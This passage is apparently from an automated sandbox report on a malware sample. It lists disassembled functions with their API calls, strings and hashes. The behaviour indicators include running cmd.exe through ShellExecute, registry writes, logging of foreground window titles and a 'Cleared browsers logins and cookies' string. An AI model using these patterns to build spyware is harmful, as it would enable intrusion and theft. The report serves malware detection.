                                                    • RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                    • RegCloseKey.ADVAPI32(004655B0,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCreateValue
                                                    • String ID: Control Panel\Desktop
                                                    • API String ID: 1818849710-27424756
                                                    • Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                    • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                    • Opcode Fuzzy Hash: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                    • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                    Function 004477A0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • IsValidLocale.KERNEL32(00000000,z=D,00000000,00000001,?,?,00443D7A,?,?,?,?,00000004), ref: 004477EC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LocaleValid
                                                    • String ID: IsValidLocaleName$Zb1Y/$z=D
                                                    • API String ID: 1901932003-1659658204
                                                    • Opcode ID: 724f10c09d6576eb41aa8f51452c5d432ff136580ab4b9325f7f83eb90576703
                                                    • Instruction ID: b87742f2873dd73c0a7d5aade023b210d3410e3306d67f57874115e62e910f2b
                                                    • Opcode Fuzzy Hash: 724f10c09d6576eb41aa8f51452c5d432ff136580ab4b9325f7f83eb90576703
                                                    • Instruction Fuzzy Hash: 72F0E930A45318F7DA106B659C06F5E7B54CF05711F50807BFD046A283CE796D0285DC
                                                    Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                    • RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCreateValue
                                                    • String ID: TUF
                                                    • API String ID: 1818849710-3431404234
                                                    • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                    • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                    • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                    • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                    Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExecuteShell
                                                    • String ID: /C $cmd.exe$open
                                                    • API String ID: 587946157-3896048727
                                                    • Opcode ID: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                    • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                    • Opcode Fuzzy Hash: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                    • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                    Function 00401430 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: GetCursorInfo$User32.dll
                                                    • API String ID: 1646373207-2714051624
                                                    • Opcode ID: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                                                    • Instruction ID: 8a619761425f66876362e8ef81435da0b65ff7d8438f08abde0d1abd95200d6c
                                                    • Opcode Fuzzy Hash: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                                                    • Instruction Fuzzy Hash: DAB092B458A3059BC7206BE0BD0EA083B64E644703B1000B2F087C1261EB788080DA6E
                                                    Function 004014D5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                    • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetLastInputInfo$User32.dll
                                                    • API String ID: 2574300362-1519888992
                                                    • Opcode ID: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                                                    • Instruction ID: d4d82ae3f827bcfb7cdfeca7c6c066ea5703a418acbc3ecfb38afa42acb71bdc
                                                    • Opcode Fuzzy Hash: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                                                    • Instruction Fuzzy Hash: 6CB092B85843449BC7212BF1BC0DA293AA8FA48B43720447AF406C21A1EB7881809F6F
                                                    Function 00448D1B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __alldvrm$_strrchr
                                                    • String ID:
                                                    • API String ID: 1036877536-0
                                                    • Opcode ID: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                    • Instruction ID: 44e25d054e292963cfc005d68317528f4d38ac36d82b99eb29904231438c363e
                                                    • Opcode Fuzzy Hash: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                    • Instruction Fuzzy Hash: C5A14671A042469FFB218F58C8817AFBBA1EF25354F28416FE5859B382CA3C8D45C759
                                                    Function 004559DA Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                    • Instruction ID: 20fe87377ae66d6b83c96c89e5a9e0461ad99f2e5d6db859ec29947640f8945c
                                                    • Opcode Fuzzy Hash: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                    • Instruction Fuzzy Hash: CB412D31A00E005BEF24AAB94CD567F37A4EF05775F18031FFC1496293D67C8C05869A
                                                    Function 00441A91 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                    • Instruction ID: 06af4f468b8ce8c690b0d071e5f1d97fd8a921e774867ed9179d92c0916ed768
                                                    • Opcode Fuzzy Hash: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                    • Instruction Fuzzy Hash: 3A412971A00744AFE724AF79CC41BAABBE8EB88714F10452FF511DB291E779A9818784
                                                    Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                    • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                    • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                    • String ID:
                                                    • API String ID: 3360349984-0
                                                    • Opcode ID: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                    • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                    • Opcode Fuzzy Hash: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                    • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                    Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                    • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                    • API String ID: 3472027048-1236744412
                                                    • Opcode ID: 39a193d0582b7eb98f903914784aef6be3ac6f15ea21b06dedc6bc4d90296757
                                                    • Instruction ID: 79c0b3a62e4074401f8092341c6d65849921352ddae30cadc40705057ad9e0e2
                                                    • Opcode Fuzzy Hash: 39a193d0582b7eb98f903914784aef6be3ac6f15ea21b06dedc6bc4d90296757
                                                    • Instruction Fuzzy Hash: FC31891564C3816ACA11777514167EB6F958A93754F0884BFF8C42B3E3DB7A480893EF
                                                    Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                      • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                      • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                    • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseOpenQuerySleepValue
                                                    • String ID: @CG$exepath$BG
                                                    • API String ID: 4119054056-3221201242
                                                    • Opcode ID: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                    • Instruction ID: 3bb97b322c4281cea59bb4e220ac43bd532ded5f68553a77fc2ada00b9ce30da
                                                    • Opcode Fuzzy Hash: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                    • Instruction Fuzzy Hash: EC21F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DF7D9D4581AD
                                                    Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0041B6F6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B706
                                                      • Part of subcall function 0041B6F6: GetWindowTextLengthW.USER32(00000000), ref: 0041B70F
                                                      • Part of subcall function 0041B6F6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B739
                                                    • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                    • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$SleepText$ForegroundLength
                                                    • String ID: [ $ ]
                                                    • API String ID: 3309952895-93608704
                                                    • Opcode ID: c7b8921fee698eb27046a54e93bbce2ae6a7b96347d281602c612aefecfbc9ba
                                                    • Instruction ID: 884b77faaa60fb736012887943be30d2742787962025037229812ea18f618e82
                                                    • Opcode Fuzzy Hash: c7b8921fee698eb27046a54e93bbce2ae6a7b96347d281602c612aefecfbc9ba
                                                    • Instruction Fuzzy Hash: 2E119F325042005BD218BB26DD17AAEB7A8AF50708F40047FF542221D3EF39AE1986DF
                                                    Function 0041B59F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6B5,00000000,00000000,00000000), ref: 0041B5DE
                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B5FB
                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B60F
                                                    • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B61C
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$CloseCreateHandlePointerWrite
                                                    • String ID:
                                                    • API String ID: 3604237281-0
                                                    • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                    • Instruction ID: 3b94612a358327762e597db0d4245ee78264fa841ead315e3e24d1cb8b3ec7b7
                                                    • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                    • Instruction Fuzzy Hash: 3F01F5712082147FE6104F28AC89EBB739DEB96379F14063AF952C22C0D765CC8596BE
                                                    Function 00442CE2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                    • Instruction ID: dab0b0a7df633c5b48e856b81aae527c8b914588f9bdc990e5f583acd93a84b2
                                                    • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                    • Instruction Fuzzy Hash: 5701F2F2A097163EF62116792CC0F6B670DDF413B9B31073BB921622E1EAE8CC42506C
                                                    Function 00442D61 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                    • Instruction ID: 297bbf4b6e7cb62aad9c1df2c980cfc74e2a715ef03096c7e716b38b90e38ed5
                                                    • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                    • Instruction Fuzzy Hash: 5401D1F2A096167EB7201A7A7DC0D67624EDF823B9371033BF421612D5EAA88C408179
                                                    Function 00438105 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0043811F
                                                      • Part of subcall function 0043806C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043809B
                                                      • Part of subcall function 0043806C: ___AdjustPointer.LIBCMT ref: 004380B6
                                                    • _UnwindNestedFrames.LIBCMT ref: 00438134
                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438145
                                                    • CallCatchBlock.LIBVCRUNTIME ref: 0043816D
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                    • String ID:
                                                    • API String ID: 737400349-0
                                                    • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                    • Instruction ID: b756294ed3ea81ca49fa364012696409ae819ba0eb544c37e892c8a1feda9a6f
                                                    • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                    • Instruction Fuzzy Hash: D7012D72100208BBDF126E96CC45DEB7B69EF4C758F04501DFE4866121C73AE862DBA4
                                                    Function 0041B62A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B657
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B67C
                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00403AF3,00465324), ref: 0041B68A
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleReadSize
                                                    • String ID:
                                                    • API String ID: 3919263394-0
                                                    • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                    • Instruction ID: 3f34627ebf18732c46889562bde790f52735f321db32931f0b6625c87776b378
                                                    • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                    • Instruction Fuzzy Hash: 81F0F6B12053047FE6101B21BC85FBF375CDB967A5F00027EFC01A22D1DA658C4591BA
                                                    Function 0041851C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemMetrics.USER32(0000004C), ref: 00418529
                                                    • GetSystemMetrics.USER32(0000004D), ref: 0041852F
                                                    • GetSystemMetrics.USER32(0000004E), ref: 00418535
                                                    • GetSystemMetrics.USER32(0000004F), ref: 0041853B
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MetricsSystem
                                                    • String ID:
                                                    • API String ID: 4116985748-0
                                                    • Opcode ID: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                    • Instruction ID: f480d68fafb364c29fc67a5f666d93eee18e0abee54110dfc95006384cbaadd6
                                                    • Opcode Fuzzy Hash: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                    • Instruction Fuzzy Hash: 72F0D672B043256BCA00EA7A4C4156FAB97DFC46A4F25083FE6059B341DE78EC4647D9
                                                    Function 0041B38D Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3E3
                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3EB
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseHandleOpenProcess
                                                    • String ID:
                                                    • API String ID: 39102293-0
                                                    • Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                    • Instruction ID: d8943217945b3e3bc9c1dbf33fc4ac7f726da2cd485b5cd5dbfa96192dfeb6c9
                                                    • Opcode Fuzzy Hash: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                    • Instruction Fuzzy Hash: 67F04971204209ABD3026794AC4AFEBB26CDF44B96F000037FA11D22A2FF74CCC146A9
                                                    Function 00441EED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __startOneArgErrorHandling.LIBCMT ref: 00441F7D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorHandling__start
                                                    • String ID: pow
                                                    • API String ID: 3213639722-2276729525
                                                    • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                    • Instruction ID: b0758be5652a64c1ac5d647a76b92dde9bac1040a8da8be5e5c84d6172790ea5
                                                    • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                    • Instruction Fuzzy Hash: E6515A61A0A20296F7117B14C98136F6B949B50741F288D6BF085823F9EF3DCCDB9A4E
                                                    Function 00420F7E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID: 4[G$4[G
                                                    • API String ID: 2931989736-4028565467
                                                    • Opcode ID: 7407f5615a9f2bba6ea498725e03585e5da529dc181768be2173bedc22af2953
                                                    • Instruction ID: 33b36a833443cc607bae0a2c4f054eab59dd7b99d1d8389eb50a0704093c1055
                                                    • Opcode Fuzzy Hash: 7407f5615a9f2bba6ea498725e03585e5da529dc181768be2173bedc22af2953
                                                    • Instruction Fuzzy Hash: E56110716047069AC714DF28D8406B3B7A8FF98304F44063EEC5D8F656E778AA25CBAD
                                                    Function 0044DE99 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0044DA6C: GetOEMCP.KERNEL32(00000000,?,?,0044DCF5,?), ref: 0044DA97
                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044DD3A,?,00000000), ref: 0044DF0D
                                                    • GetCPInfo.KERNEL32(00000000,0044DD3A,?,?,?,0044DD3A,?,00000000), ref: 0044DF20
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CodeInfoPageValid
                                                    • String ID: Zb1Y/
                                                    • API String ID: 546120528-3232713500
                                                    • Opcode ID: 53f6a56cd97a0974a2183497a5087aed56a9e6d0f65aaaec85088475c598411f
                                                    • Instruction ID: 680d193c1215018c629ac6589cc292c2450b0c8a9200b756f3f1b883069c5345
                                                    • Opcode Fuzzy Hash: 53f6a56cd97a0974a2183497a5087aed56a9e6d0f65aaaec85088475c598411f
                                                    • Instruction Fuzzy Hash: 2C513170E042059EFB308F36C8816BBBBE5EF01304F14446FE0978B352D67D994A8B98
                                                    Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountEventTick
                                                    • String ID: >G
                                                    • API String ID: 180926312-1296849874
